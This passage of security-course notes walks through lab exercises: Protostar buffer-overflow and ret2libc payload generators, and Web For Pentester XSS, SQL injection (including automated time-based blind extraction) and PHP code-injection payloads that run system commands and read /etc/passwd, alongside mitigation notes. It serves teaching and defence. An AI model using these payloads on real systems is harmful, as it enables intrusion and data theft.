For a precise calculation: disassemble `main`, run `unset env LINES` and `unset env COLUMNS` (important: `gdb` adds them, which shifts the buffer start address compared with running outside `gdb`), breakpoint the `gets` line to read the buffer address from `eax`, print the return address with `p $ebp+4`, compute the distance.

Payload generator:

```python
#!/usr/bin/python
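length   = <distance>            # buffer start to return address, from gdb
ret      = '<buffer address>'    # little-endian bytes of the buffer start
shellcode = "<shellcode>"        # must be shorter than length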
padding  = 'a' * (length - len(shellcode))
payload  = shellcode + padding + ret
print payload
```

```bash
chmod +x genpayload.py
python /tmp/genpayload.py > /tmp/payload
(cat /tmp/payload; cat) | /opt/protostar/bin/stack5
```

The second `cat` keeps the pipe open (keeps `stdin` open), letting us interact with the shell spawned by the shellcode.

## Stack 6

Here `main` calls `getpath`, which contains a `gets` vulnerability. Unlike Stack 5, the return address is also checked: if it points back into the program's own stack, it prints an error and exits, which prevents shellcode injection on the stack. Instead of jumping to the stack, we jump to a system function (a **ret2libc**-style approach) to achieve arbitrary behavior.

Steps as before: compute the buffer-to-return-address length; in `gdb` also find the addresses of `system()`, `exit()`, and the buffer start, because we will call `system()` passing it the exit address and the address where the command will be (the buffer start, where we place `/bin//sh\x00`). The `//` is read as a single `/` but helps alignment; `\x00` is the string terminator that `system` expects.

Payload generator:

```python
#!/usr/bin/python
print '/bin//sh\x00' + 'a' * (<length> - len('/bin//sh\x00')) \
      + <system address> + <exit address> + <buffer address>
```

```bash
python /tmp/genpayload2.py > /tmp/payload2
(cat /tmp/payload2; cat) | /opt/protostar/bin/stack6
```

This bypasses the check imposed by the program.

---

# Part IV – Web For Pentester

## XSS

### Example 1

No input check at all; the user-supplied value is printed directly into the HTML body without sanitization, so HTML/JavaScript injected via the `name` parameter is interpreted and executed by the browser.

```
http://localhost:8080/xss/example1.php?name=<script>alert('XSS')</script>
```

**Mitigation:** sanitize and validate inputs, escape special characters, use whitelists, etc.

### Example 2

Like Example 1 (input reflection), but with a weak check that looks for the `<script>` tags to block them. Since it's weak, other XSS injections work:

```
http://localhost:8080/xss/example2.php?name=
```

Because the check is case-sensitive, a mixed-case tag such as `<ScRiPt>...</ScRiPt>` also gets through.

**Mitigation:** sanitize/validate inputs, escape special characters, whitelist, etc.

### Example 3

Like Example 2 but now case-insensitive for the script tags. Still a weak defense, so other XSS injections work:

```
http://localhost:8080/xss/example3.php?name=
```

**Mitigation:** sanitize/validate inputs, escape special characters, whitelist, etc.

## SQL Injection

> Once you understand the defenses, beyond tautologies you can run queries to find the number of columns, which ones are visible, and query table/column names to extract precise information.

### Example 1

Without seeing the code, test for SQL injection with special characters like `'` to close the query. If the page behaves differently, you've hit it. First try tautologies, like `' OR 1=1%23`, to print the whole table (this works because the code uses a `while` loop to iterate over all result rows and print each record as a table row, showing multiple results at once).

**Mitigation:** sanitize/validate inputs, use prepared statements to parameterize the data, escape special characters, whitelist, etc.
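The contrast between string concatenation and a prepared statement can be reproduced locally with Python's built-in `sqlite3` module. This is an illustrative sketch with a made-up `users` table; note that SQLite uses `--` for comments where the MySQL examples here use `#` (`%23`).

```python
import sqlite3

def setup() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, age INTEGER)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("root", 30), ("admin", 40), ("guest", 20)])
    return db

def lookup_concatenated(db, name: str) -> list:
    """Vulnerable: the value becomes part of the SQL text."""
    query = "SELECT name FROM users WHERE name = '" + name + "'"
    return db.execute(query).fetchall()

def lookup_prepared(db, name: str) -> list:
    """Parameterized: the value is bound as data, never parsed as SQL."""
    return db.execute("SELECT name FROM users WHERE name = ?",
                      (name,)).fetchall()

db = setup()
tautology = "' OR 1=1 -- "
print(len(lookup_concatenated(db, tautology)))   # 3
print(len(lookup_prepared(db, tautology)))       # 0
```

With the bound parameter the tautology is compared as a literal string, so it matches no row.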

### Example 2

Very similar, but adds a check for the presence of spaces. Bypass it with SQL comments `/**/`:

```
'/**/OR/**/1=1%23
```

Or replace each space with a tab (`%09`) or a newline (`%0A`); the leading `'` can also be sent URL-encoded as `%27`:

```
'%0AOR%0A1=1%23
```

**Mitigation:** sanitize/validate inputs, prepared statements, escape special characters, whitelist, etc.

### Example 3

Like Example 2 but tab and newline are also blocked, so the solution remains SQL comments: `'/**/OR/**/1=1%23`.
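The difference between the two filters can be sketched as follows. The regular expressions are assumptions (a literal-space check for Example 2, an any-whitespace check for Example 3), since the lab's source is not shown here; the payloads are the ones from the notes plus a plain-space baseline.

```python
import re
from urllib.parse import unquote


def blocked_by_space_check(value: str) -> bool:
    """Assumed Example 2-style check: rejects literal spaces only."""
    return re.search(r" ", value) is not None


def blocked_by_whitespace_check(value: str) -> bool:
    """Assumed Example 3-style check: rejects any whitespace character."""
    return re.search(r"\s", value) is not None


payloads = {
    "plain": "'%20OR%201=1%23",
    "comment": "'/**/OR/**/1=1%23",
    "tab": "'%09OR%091=1%23",
    "newline": "'%0AOR%0A1=1%23",
}

for label, encoded in payloads.items():
    decoded = unquote(encoded)  # what the server sees after URL decoding
    print(
        label,
        "space check blocks:", blocked_by_space_check(decoded),
        "| whitespace check blocks:", blocked_by_whitespace_check(decoded),
    )
```

Only the comment-based payload passes both checks, which matches the observation that `/**/` remains the working separator in Example 3.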

### Example 4

The `id` parameter is passed through `mysql_real_escape_string` before being put in the query, which escapes dangerous characters inside quoted strings. To bypass it, simply don't close a quote (the value isn't quoted here) and run the same queries:

```
id=3 OR 1=1%23
```

### Example 5

Similar, but it only checks that the input *starts* with one or more digits, without verifying the whole input is numeric โ€” so the previous example still works.

### Example 6

Like Example 5, but the input must *end* with one or more digits or it errors out.

### Example 7

A more structured check: it verifies that the line contains only an integer. That is exactly the weakness to exploit, because the check is applied per line rather than to the whole input. Add a newline followed by the arbitrary SQL:

```
id=2%0A OR 1=1%23
```
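A per-line check of this kind can be reproduced in a few lines of Python. The pattern below is an assumption about what the page does (an integer regex evaluated in multiline mode), and it uses the newline encoding `%0A`; the function names are illustrative.

```python
import re
from urllib.parse import unquote

# Assumed shape of the vulnerable check: anchors match at every line boundary.
PER_LINE_INTEGER = re.compile(r"^-?[0-9]+$", re.MULTILINE)


def weak_is_integer(value: str) -> bool:
    """True if ANY line of the input is an integer."""
    return PER_LINE_INTEGER.search(value) is not None


def strict_is_integer(value: str) -> bool:
    """True only if the WHOLE input is an integer."""
    return re.fullmatch(r"-?[0-9]+", value) is not None


payload = unquote("2%0A OR 1=1%23")  # "2", a newline, then " OR 1=1#"

print(weak_is_integer(payload))    # the first line "2" satisfies the check
print(strict_is_integer(payload))  # the full string does not
print(strict_is_integer("2"))      # a plain id is still accepted
```

Matching the whole input (or casting it to an integer before use) closes the gap, because nothing after the first line can survive the check.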

### Example 8 – Blind (time-based) SQL injection

Solved in class to show how to exploit a page via blind SQL injection. In the code, the parameter we control (`ORDER`) never appears in the output, so injecting something malicious shows no error message and no visible page change. Hence a **time-based blind** attack, observing the server's response times.

Notes/peculiarities of this query:

- Input reflection happens on an `ORDER BY` statement at the end of the query.
- The backtick `` ` `` is used to delimit the parameter instead of a single/double quote.
- An input filter `mysql_real_escape_string` escapes special characters (including quotes), **but it does not filter the backtick**, so injection is still possible.
- The `ORDER BY` clause prevents a `UNION` (it closes the query) and takes an ordering parameter, making it harder to extract information from the page.

Useful building blocks:

- **`sleep(N)`**: SQL function that sleeps for N seconds and returns 0 when done.
- **SQL short-circuit logic**: with `AND`/`OR`, the second clause is not evaluated if the first already determines the result: `0 AND expr` and `1 OR expr` skip `expr`. Combined with `SLEEP(N)`, this lets us decide whether a clause is true or false based on response time. *Note: the sleep is applied per row of the query.*
- **`ORDER BY` internals**: to order by a column, MySQL first checks for an index; otherwise it uses the generic **filesort** procedure (`SHOW INDEX FROM users;` checks for an index). In this example there is no index, so filesort is applied, which is why the injected boolean expression gets evaluated.
- **SQL boolean values**: there are three. A value convertible to an integer is `FALSE` if it is 0 and `TRUE` otherwise; a non-convertible value becomes `UNKNOWN`. **String to boolean:** a string is `TRUE` if it starts with a nonzero number and `FALSE` otherwise (so every non-null string in this example converts to `FALSE`).
- **Boolean `ORDER BY`**: ascending puts all `FALSE` rows first, then `TRUE`; descending puts all `TRUE` rows first, then `FALSE`.
- **`IF(expr, v1, v2)`**: returns one of two values based on the evaluated boolean; we use it to introduce a statement whose result we monitor via `sleep()`.
- **`DATABASE()`**: returns the current database name.

First, find the database-name length. The query below tests one candidate `n` at a time; replacing `=` with `>` allows a binary search, which reduces the number of queries:

```
name ` OR if(length(database())=n, sleep(1), NULL)%23
```

If `n` is correct, the response arrives only after the sleep; otherwise it returns immediately. Then brute-force the name character by character, binary-searching the ASCII range 32-127 with `ASCII()` and `SUBSTRING(str, k, 1)`, which extracts the k-th character (positions run from 1 to n, not from 0):

```
name ` OR if(ASCII(SUBSTRING(database(),1,1))>N_ASCII, SLEEP(1), NULL)%23
```

Once a letter is found, increase the `SUBSTRING` index to the next character until the full string is recovered. The same procedure can be applied to other values, and it is fully automatable with a script.
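The automation can be sketched as below. This is not the script used in class: the oracle here is simulated locally so that the example runs without a target, whereas a real oracle would send the payload and return `True` when the response takes about as long as the sleep. The length payload uses `>` instead of `=` so that it can be binary-searched, and the secret `exercises` and the 64-character upper bound are arbitrary stand-ins.

```python
import re
from typing import Callable, List, Tuple

Oracle = Callable[[str], bool]  # True means "the response was slow"


def length_payload(n: int) -> str:
    return f"name` OR if(length(database())>{n}, sleep(1), NULL)%23"


def char_payload(pos: int, n: int) -> str:
    return f"name` OR if(ASCII(SUBSTRING(database(),{pos},1))>{n}, SLEEP(1), NULL)%23"


def binary_search(is_greater: Callable[[int], bool], lo: int, hi: int) -> int:
    """Finds the hidden value v in [lo, hi], given answers to 'v > candidate?'."""
    while lo < hi:
        mid = (lo + hi) // 2
        if is_greater(mid):
            lo = mid + 1
        else:
            hi = mid
    return lo


def recover_database_name(oracle: Oracle, max_len: int = 64) -> str:
    length = binary_search(lambda n: oracle(length_payload(n)), 0, max_len)
    chars = [
        chr(binary_search(lambda n, p=pos: oracle(char_payload(p, n)), 32, 127))
        for pos in range(1, length + 1)  # SQL positions start at 1
    ]
    return "".join(chars)


def make_simulated_oracle(secret: str) -> Tuple[Oracle, List[str]]:
    """Local stand-in for the timing measurement; records every payload sent."""
    sent: List[str] = []

    def oracle(payload: str) -> bool:
        sent.append(payload)
        m = re.search(r"length\(database\(\)\)>(\d+)", payload)
        if m:
            return len(secret) > int(m.group(1))
        m = re.search(r"SUBSTRING\(database\(\),(\d+),1\)\)>(\d+)", payload)
        pos, n = int(m.group(1)), int(m.group(2))
        return ord(secret[pos - 1]) > n

    return oracle, sent


oracle, sent = make_simulated_oracle("exercises")
recovered = recover_database_name(oracle)
print(recovered, "recovered with", len(sent), "queries")
```

Each value costs at most seven queries with these bounds, compared with up to 96 for a linear scan of the same ASCII range.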

### Example 9

Very similar to Example 8 but more vulnerable, because the check is on strings and the input is **not** wrapped in quotes, so the malicious code can be injected without closing any quote. As in the previous example, blind attacks work since the controlled parameter never reaches the output:

```
Order=if(length(database())=n, sleep(1), NULL)%23
```

## Code Injection

### Example 1

User input is interpolated into a string and passed to `eval()` (which runs the content as PHP). To exploit, close the quotes of the input parameter and inject arbitrary code:

```php
hacker"; system("id");//
```

**Mitigation:** avoid `eval` where possible; otherwise sanitize the user input thoroughly.
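To see why closing the quote is enough, it helps to look at the string that ends up in `eval()`. The template below is a hypothetical reconstruction of the page's code (the real source is not shown in these notes); the Python function only builds the PHP string and never executes it.

```python
def build_eval_string(name: str) -> str:
    """Hypothetical reconstruction of the PHP code string handed to eval()."""
    return 'echo "Hello ' + name + '!!!";'


benign = build_eval_string("hacker")
injected = build_eval_string('hacker"; system("id");//')

print(benign)    # a single echo statement
print(injected)  # the echo ends early, system("id") follows, the rest is commented out
```

The injected value turns one statement into two, and the trailing `//` hides the leftover `!!!";` that would otherwise cause a syntax error.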

### Example 2

Again uncontrolled, unsanitized input, plus the deprecated PHP function `create_function()`, which dynamically creates an anonymous function from a PHP code string and internally uses `eval()`. Read the code and find how to inject: close the `strcmp` with `)` and `;`, close the function with `}`, then inject and end with `;` and a comment:

```php
id);}phpinfo();#
```

**Mitigation:** remove deprecated functions like `create_function` and sanitize inputs.

### Example 3

Three input parameters, none of them checked, are passed to `preg_replace`, which replaces every match of a pattern with another string. `pattern` is the expression to search for, `base` is the string being searched (the third argument), and `new` replaces each match. Example: `new=hacker&pattern=/lamer/&base=Hello%20lamer` gives `Hello hacker`. With no checks:

```
new=system("tail /etc/passwd")&pattern=/x/e&base=x
```

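Important: include the `/e` modifier, which makes PHP evaluate the replacement string as code, so `system` runs via `eval`.

**Mitigation:** validate and sanitize inputs, and use safer functions. The `/e` modifier was deprecated in PHP 5.5 and removed in PHP 7; `preg_replace_callback` is the safer replacement.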

### Example 4

Multiple vulnerabilities: `assert` is called on user-controlled input. The input is wrapped in single quotes and passed through `trim()` (which strips leading and trailing whitespace), then handed to `assert`, which accepts a string and evaluates it as PHP. To exploit, close the string with `'` and use `.` to concatenate:

```php
' . phpinfo() . '
```

**Mitigation:** don't use `assert` with strings; add input checks.

---

# Appendix – Exam section index

The exercises were also organized by exam section. Sections **4x** cover attacks/exploits; sections **5x** cover the corresponding mitigations.

| Section | Focus | Exercises |
|---------|-------|-----------|
| 4b | SUID / effective UID | Nebula 00, Nebula 01, Protostar Stack 5 |
| 4c | Reflection & command injection | Nebula 02, Protostar Stack 1 & 3, W4P input reflection, W4P file include 1, W4P SQL 1 |
| 4d | Writable dirs, exposed assets, hashes, pcap | Nebula 03, 05, 06, 08; W4P SQL 1 (SQL forgery) |
| 4e | TOCTOU race condition | Nebula 10 |
| 4f | PATH/env injection, LD_PRELOAD, blind SQLi | Protostar Stack 5; Nebula 01, 02, 07, 13; W4P code injection 1; W4P injection 8 |
| 5b | Privilege drop, bash 4.2 privmode, config hardening | Nebula 01 (mitigations), Nebula 07 (mitigation) |
| 5c | Remove debug output, lower privileges, prod config | Nebula 02 (mitigation), W4P include 1, W4P injections 1 |
| 5d | Permission hardening, /etc/shadow, SSL/TLS | Nebula 03, 06; W4P virtual host (HTTPS) |

### Mitigation notes (sections 5x)

**Nebula 01, second mitigation.** After removing the SUID bit, the PATH exploit no longer works; alternatively, modify the source to drop privileges at the start of execution. A separate weakness: **bash 4.2** does not drop privileges at startup when the shell is invoked as `/bin/sh` (and `system()` runs commands via `/bin/sh`). Studying the Debian package's **privmode patch** shows it adds an invocation check for releasing privileges; the patch can be removed by rebuilding the package with `dpkg-buildpackage` (building unsigned and without tests to save time).

**Nebula 02, mitigation.** The binary prints a revealing message and uses `PATH` for command injection. Removing the output alone doesn't fix it; also lower the binary's privileges and remove debug messages. (Reverse-engineering the symbol-stripped binary is harder but doable with the right tools. Tip: prefer using links to modify files rather than rewriting them.)

**Nebula 03, mitigation (three measures).** (1) Change the directory's group and restrict access to the `flag03` group. (2) Stricter: grant directory permissions only to user `flag03`. (3) Slightly paranoid but useful: also restrict access to `flag03`'s home directory. In theory restricting the directory suffices, but tightening permissions wherever possible is good practice.
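The effect of the first two measures on the permission bits can be illustrated with a short sketch. It runs on a throwaway temporary directory rather than the real Nebula path, assumes a POSIX system, and does not change the group owner (that step needs appropriate privileges); the helper names are invented for the example.

```python
import os
import stat
import tempfile


def permission_bits(path: str) -> int:
    """Returns only the permission part of the file mode."""
    return stat.S_IMODE(os.stat(path).st_mode)


def others_can_access(path: str) -> bool:
    """True if any read/write/execute bit is set for 'others'."""
    return bool(permission_bits(path) & stat.S_IRWXO)


with tempfile.TemporaryDirectory() as demo_dir:
    os.chmod(demo_dir, 0o777)                 # world-writable starting point
    open_to_others = others_can_access(demo_dir)

    os.chmod(demo_dir, 0o770)                 # measure 1: owner and group only
    group_only_mode = permission_bits(demo_dir)

    os.chmod(demo_dir, 0o700)                 # measure 2: owner only
    owner_only_mode = permission_bits(demo_dir)
    still_open = others_can_access(demo_dir)

print(open_to_others, oct(group_only_mode), oct(owner_only_mode), still_open)
```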

**Nebula 06, mitigation.** Move the hash from the world-readable `/etc/passwd` to `/etc/shadow`, accessible only by root (requires superuser).

**Nebula 07, mitigation.** The Perl-based web app runs with excessive privileges. Use `ss -ntl` to find listening ports (7007 is the server). Copy the config file and server, change the port, working directory, and user, and adjust permissions so the server can no longer run `getflag` with elevated privileges.

**W4P include 1, mitigation.** Simply mistyping a URL can reveal server information or crash messages, because Apache runs in debug mode and prints error messages. The `php-common` Debian package provides common config files, including production-oriented ones. After backing up the config, change Apache's PHP configuration so error messages are no longer printed, denying the attacker information from crashes.

**W4P injections 1, mitigation.** The page acts as an oracle and leaks a lot of information: its structure changes on a crash, and it prints all query rows even though logically it should receive only one. Normalize the output by splitting the PHP tag so the table is always created (regardless of a crash), and print only one row by calling `mysql_fetch_assoc($result)` once (which returns the first entry). Besides hiding information, this also protects against tautological injections (`OR 1=1`): even if the first clause becomes true for every row, only one result is returned.

**W4P virtual host, HTTPS hardening.** The app sends traffic in cleartext, so an attacker can read it. A **virtual host** is a web-server configuration served by a physical host, which can serve several as long as their IDs differ. The default virtual host serves unencrypted HTTP; in Apache 2 the virtual-host configs live under `/etc/apache2`, where a second one named `default-ssl` exists. SSL/TLS encryption requires a PEM certificate (base64, ASN.1 formatted) binding a public key to a domain name, a private key in the same format, and a CA signature (or automatic renewal via **Let's Encrypt**). For the course a **self-signed certificate** is used (fine for debugging, **NOT acceptable in the real world**), together with a browser that allows proceeding despite the warning (e.g. **epiphany**). Load the security modules with `a2enmod`, switch the site's virtual host to `default-ssl` (HTTPS), restart Apache, and forward the new VM port. Monitoring with Wireshark afterwards shows no more HTTP traffic; QUIC/SSL packets carry application data whose content cannot be interpreted (though traffic analysis can still reveal which domain/page is being requested).

---

*Notes consolidated from coursework; some material is also explained step by step in the course slides.*